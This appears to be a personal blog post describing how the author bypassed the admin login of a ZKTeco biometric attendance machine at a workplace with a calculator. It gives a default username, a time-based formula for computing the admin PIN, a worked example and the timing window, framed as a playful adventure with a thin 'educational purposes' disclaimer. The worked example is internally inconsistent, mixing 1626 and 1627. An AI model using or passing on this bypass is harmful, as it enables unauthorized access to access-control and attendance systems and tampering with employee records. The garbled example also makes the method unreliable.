How I hacked Biometric machine just by using a calculator
Imagine this: You’re surrounded by colleagues carefully placing their thumbs on a seemingly secure biometric attendance machine. But you, the security curious kid, notice and triggers a sudden urge to investigate. A playful smile spreads across my face as i thought about different possibilities. Curious? Get ready, because we’re about to explore how a basic calculator app might (in some cases, not always) bypass a biometric system, depending on the device’s security measures.
Let’s set the scene. We’re in a place that used a specific brand of attendance machine which was ZKTeco (some random version). This machine records employee arrivals and departures. Now, I, the curious security enthusiast, can’t resist a little investigation. I’ve seen some complex hacking tutorials online, but they require a laptop and enough time to attract unwanted attention. Not ideal in a public setting. Then, a glimmer of hope! I stumble upon a particular video — a hacker using a simple calculator app to bypass the login! Sounds too fictional to be true, right? Well, that’s the beauty of security adventures. I decided to give it a shot. The login screen demanded a username and PIN. The username, I discover through some reconnaissance was likely the default “8888”. But the PIN — that’s a whole different story. It’s a long, random string of numbers, seemingly impossible to crack through brute force as it was almost 8–9 numbers and had 100,000,000 combinations of pins if we just took it as 8 numbers of PIN.
I discovered into the world of (possibly made-up) mathematical formulas. And read a secret equation that was said to unlock the PIN’s secrets. Here’s where things got a little fuzzy (because, you know, plausibility). The formula involved subtracting the current time in 24-hour format from a large number (like 9999) and then multiplying the result by itself.
For instance, if the current time is 4:26 PM (which is 1626 in 24-hour format), the calculation would be:
9999 - 1627 = 8371
8371 * 8371 = 70,073,641And there I had it! I got a special PIN (70073641 in this case) that was supposed to work with the username 8888. This PIN will work for 1 minute. Wait for the clock to reach 04:27 PM, and it will be valid until 4:28 PM. We used 4:27 to save some time and do calculations at 4:26 PM itself, then used that key at the right time.
Now, before you grab your phone and try this on every attendance machine you encounter.
This is purely for educational purposes. Messing with attendance systems in real life can have serious consequences. In the real world of security, responsible disclosure is key. If you find a vulnerability, you should report it to the vendor so they can patch it.
Well, folks, this tale shows how even a simple calculator can become a sneaky security wizard! It reminds us to stay curious, think creatively, and never underestimate the power of imagination. But hey, in the real world, let’s keep it ethical and responsible. Playing Sherlock with security is cool, but causing chaos isn’t! So, keep those brains buzzing, but also keep it safe and legit.
Don’t forget to share, like and follow. Until next time. Happy hacking!
